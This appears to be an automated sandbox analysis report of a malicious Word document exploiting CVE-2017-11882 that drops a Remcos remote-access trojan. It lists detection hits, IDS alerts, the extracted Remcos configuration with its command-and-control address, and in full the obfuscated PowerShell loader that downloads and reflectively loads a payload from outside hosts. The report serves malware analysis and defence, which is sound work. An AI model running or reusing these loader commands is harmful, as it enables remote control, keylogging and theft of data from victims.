"C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , ProcessId: 3872, ProcessName: wscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3800, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , ProcessId: 3872, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName:
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 2136, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq", ProcessId: 1972, ProcessName: RegAsm.exe
Source: Network Connection; Author: X__Junior (Nextron Systems); Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3348, Protocol: tcp, SourceIp: 172.67.216.244, SourceIsIpv6: false, SourcePort: 443
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3800, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , ProcessId: 3872, ProcessName: wscript.exe
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3348, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, 
NewProcessName:
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3348, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', 
{2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3916, TargetFilename: C:\Users\user\AppData\Local\Temp\rm3mxia0.zqh.ps1

                Stealing of Sensitive Information

                Source: Registry Key set | Author: Joe Security | Data: Details: 5F EE CB D7 76 BE 8E 23 5B C5 5A 49 A6 B5 C9 65 58 75 69 01 B6 BA 0E 48 17 3F A3 8F C5 FA A9 E4 AD C5 79 87 27 36 F8 02 13 CD 7D E9 B5 BE 7A D9 AD AB 3D 5F F0 45 76 6C 70 3E 82 98 D0 5A C5 B0 AC 24 54 0B C5 DF B9 BD BF 97 6A C1 9A 60 8E 61 45 D1 A0 35 06 CE 19 3D DA F5 C4 8A F2 6E 19 46 D9 01 8F 5B 21 99 99 6D 8B BD 46 AB 45 FA 37 8F 1A 3D , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 2136, TargetObject: HKEY_CURRENT_USER\Software\Rmc-IAW1Y3\exepath
                Timestamp                       | SID     | Severity | Classtype                                     | Source IP      | Source Port | Destination IP  | Destination Port | Protocol
                2024-10-01T09:25:30.278282+0200 | 2020423 | 1        | Exploit Kit Activity Detected                 | 104.168.7.8    | 80          | 192.168.2.22    | 49171            | TCP
                2024-10-01T09:25:30.278282+0200 | 2020425 | 1        | Exploit Kit Activity Detected                 | 104.168.7.8    | 80          | 192.168.2.22    | 49171            | TCP
                2024-10-01T09:25:32.788889+0200 | 2036594 | 1        | Malware Command and Control Activity Detected | 192.168.2.22   | 49172       | 103.186.116.99  | 58934            | TCP
                2024-10-01T09:25:34.988681+0200 | 2036594 | 1        | Malware Command and Control Activity Detected | 192.168.2.22   | 49173       | 103.186.116.99  | 58934            | TCP
                2024-10-01T09:29:07.807333+0200 | 2036594 | 1        | Malware Command and Control Activity Detected | 192.168.2.22   | 49175       | 103.186.116.99  | 58934            | TCP
                2024-10-01T09:29:08.088141+0200 | 2036594 | 1        | Malware Command and Control Activity Detected | 192.168.2.22   | 49176       | 103.186.116.99  | 58934            | TCP
                2024-10-01T09:29:15.578303+0200 | 2036594 | 1        | Malware Command and Control Activity Detected | 192.168.2.22   | 49177       | 103.186.116.99  | 58934            | TCP
                2024-10-01T09:25:34.799977+0200 | 2803304 | 3        | Unknown Traffic                               | 192.168.2.22   | 49174       | 178.237.33.50   | 80               | TCP

                AV Detection

                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E867F054-9E2E-42CB-9DBD-A2E82224CF64}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].doc | Avira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F971B2FE.doc | Avira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "103.186.116.99:58934:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-IAW1Y3", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: Scan Order and Specification 01-10- 2024.docx | Virustotal: Detection: 7%
                Source: Yara match | File source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR
                Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\nor\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,13_2_004338C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00404423 FreeLibrary,CryptUnprotectData,15_2_00404423
                Source: powershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

                Exploits

                Source: Yara match | File source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 104.168.7.8 Port: 80
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe
                Source: ~WRF{E867F054-9E2E-42CB-9DBD-A2E82224CF64}.tmp.0.dr | Stream path '_1789258272/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                Privilege Escalation

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00407538 _wcslen,CoGetObject,13_2_00407538
                Source: unknown | HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: unknown | HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: unknown | HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000C.00000002.407100012.0000000000789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.407267759.0000000000F50000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
